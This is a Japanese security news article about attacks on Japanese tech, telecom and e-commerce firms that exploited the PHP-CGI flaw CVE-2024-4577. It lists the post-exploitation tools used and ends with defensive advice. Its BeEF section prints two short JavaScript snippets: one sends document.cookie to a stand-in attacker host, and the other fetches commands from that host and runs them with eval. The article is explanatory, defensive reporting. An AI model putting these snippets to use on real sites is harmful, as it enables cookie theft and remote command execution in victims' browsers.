日本の技術と通信業界を狙う脆弱性攻撃の新たな波

当ページはアフィリエイト広告を利用しています

記事内に広告が含まれています。
日本の技術と通信業界を狙う脆弱性攻撃の新たな波
提供:photoAC「TY_Photo様」

日本の技術、通信、エンターテインメント、教育、eコマースといった幅広い業界が、2025年1月以降、未曾有のサイバー攻撃の標的となっています。この攻撃では、PHP-CGIにおける重大な脆弱性「CVE-2024-4577」が悪用され、攻撃者は高度な侵入手法とツールを駆使して企業ネットワークに侵入。認証情報の窃取や持続的なアクセス権の確立に加え、さらなる攻撃への準備を進めていると見られています。本記事では、この攻撃の詳細や使用されたツール、そして今後のリスクについてお伝えします。

CVE-2024-4577

攻撃者は、CVE-2024-4577というWindows上のPHP-CGIにおけるリモートコード実行(RCE)の脆弱性を利用して、被害者のマシンへ初期アクセスを行いました。

主な手法

  • Cobalt StrikeのTaoWuプラグイン: 持続的な侵入と不正操作に活用。
  • PowerShellスクリプト: Cobalt Strikeのペイロードを実行。
  • JuicyPotato、RottenPotato、SweetPotato: 権限昇格。
  • Fscan、Seatbelt: 偵察および横移動。
  • Windowsレジストリの変更、タスクスケジューリング、カスタムサービス: 持続性の確立。

TaoWuプラグインの概要について

TaoWu(檮杌)は、Cobalt Strikeのアグレッサースクリプト(Aggressor Script)をベースにしたツールキットで、攻撃者がポストエクスプロイト(侵入後の操作)を効率的に行うために使用されます。主に情報収集、権限昇格、横移動、持続性の確立などの機能を提供します。そして、侵入の方法は攻撃者によって異なりますが、今回のケースでは先述のCVE-2024-4577というPHP-CGIのリモートコード実行(RCE)脆弱性が悪用されています。この脆弱性を利用して、攻撃者はターゲットのシステムに初期アクセスを確立しているというわけです。※なお、TaoWuプラグインは、GitHubなどで公開されている場合があるとのこと。

隠密のための手法

攻撃者は以下の方法で痕跡を消しています:

  • イベントログの削除: wevtutilコマンドを使用して、セキュリティやシステムログを消去。
  • Mimikatzの使用: メモリ内のパスワードやNTLMハッシュを抽出・窃取。NTLMハッシュとは、パスワード自体をシステムに保存するのはセキュリティリスクが高いため、Windowsはパスワードをハッシュ化(元のデータを一方向に暗号化)して保存します。このハッシュ化されたデータがNTLMハッシュです。攻撃者がMimikatzのようなツールを用いると、NTLMハッシュをメモリから盗むことが可能になります。※ですので、最新のセキュリティパッチを適用してください。

攻撃の結果と痕跡

攻撃は最終的に、感染したホストからパスワードやNTLMハッシュを盗むことで完了しました。また、分析の過程でCobalt StrikeのC2サーバーがインターネット上に公開されており、攻撃者の使用したツールがAlibabaクラウドサーバーにホストされていることが判明しました。

使用された主なツール

  • Browser Exploitation Framework (BeEF): ブラウザ内でのコマンド実行を可能にするペンテストツール。
  • Viper C2: リモートコマンド実行やMeterpreterリバースシェルペイロードを生成。
  • Blue-Lotus: クロスサイトスクリプティング(XSS)攻撃やウェブシェルの作成、クッキー窃取に特化したフレームワーク。

BeEFを悪用したブラウザ攻撃

BeEFはセキュリティ専門家やペネトレーションテスターが、ウェブブラウザやクライアントサイドのセキュリティ脆弱性を評価・診断するために作られたツールです。しかしサイバー犯罪者がこのような強力なツールを悪用することで、攻撃手段として使われるケースがあるのも事実です。以下はBeEFを使用した攻撃の流れです。

①、BeEFを悪用: 攻撃者がBeEFを利用し、ブラウザをフックするための悪意あるJavaScriptを埋め込みます。

②、ブラウザをフック: 被害者が該当ウェブページを訪問すると、スクリプトが実行され、攻撃者のサーバーとブラウザ間に接続が確立されます。

③、JavaScriptによる悪意のある送受信: フックされたブラウザを介して、データの送信や攻撃指令の受信が行われます。※以下はその簡単な例です。

被害者のブラウザから攻撃者のサーバーに送信

var hookUrl = "http://attacker-server.com/hook";

// フックの設定: 攻撃者サーバーにデータを送信
var img = new Image();
img.src = hookUrl + "?data=" + document.cookie;

攻撃者のサーバーから被害者のデバイスに向けてコマンドを実行

fetch("http://attacker-server.com/command")
  .then(response => response.json())
  .then(data => {
    // 受信した攻撃者のコマンドを実行
    eval(data.command);
  });

④、シェルの実行: 攻撃者はさらにリバースシェルなどを展開し、被害者のシステムに侵入して操作を続けます。

BeEF攻撃の防御策
  • CSP(Content Security Policy)を適用して、外部スクリプトの読み込みを制限。
  • 最新ブラウザを使用: 古いブラウザはこうした攻撃に対する防御が不十分。
  • 不審なサイトやリンクを避ける: 攻撃者が仕掛けたスクリプトを実行させない。

攻撃者の動機と将来のリスク

日本の技術、通信、エンターテインメント、教育、eコマースといった幅広い業界が、CVE-2024-4577脆弱性を悪用した高度なサイバー攻撃の標的となっています。この攻撃は、攻撃者がPHP-CGIのリモートコード実行(RCE)脆弱性を利用して初期アクセスを取得し、さらにCobalt Strikeや複数のエクスプロイトツールを駆使して進行するというものです。攻撃者は被害者のシステム内に持続的なアクセス権を確立し、権限昇格や情報窃取を行い、最終的にはNTLMハッシュやパスワードの抽出を試みています。

さらに、分析によって攻撃者が使用するツールセットが明らかになり、ブラウザの脆弱性を悪用する「BeEF」や、リモート操作を可能にするC2フレームワーク「Viper C2」、XSS攻撃を強化する「Blue-Lotus」など、強力なツールが利用されていることが分かっています。この攻撃は、認証情報の窃取を超え、将来的な大規模攻撃の準備が示唆されています。

こうした脅威に対処するためには、脆弱性の早期修正、システムの監視強化、不審な活動への迅速な対応が欠かせません。技術の進化に伴うリスクを理解し、予防的なセキュリティ対策を徹底することが重要です。

出典

The Hacker News『PHP-CGI RCE Flaw Exploited in Attacks on Japan’s Tech, Telecom, and E-Commerce Sectors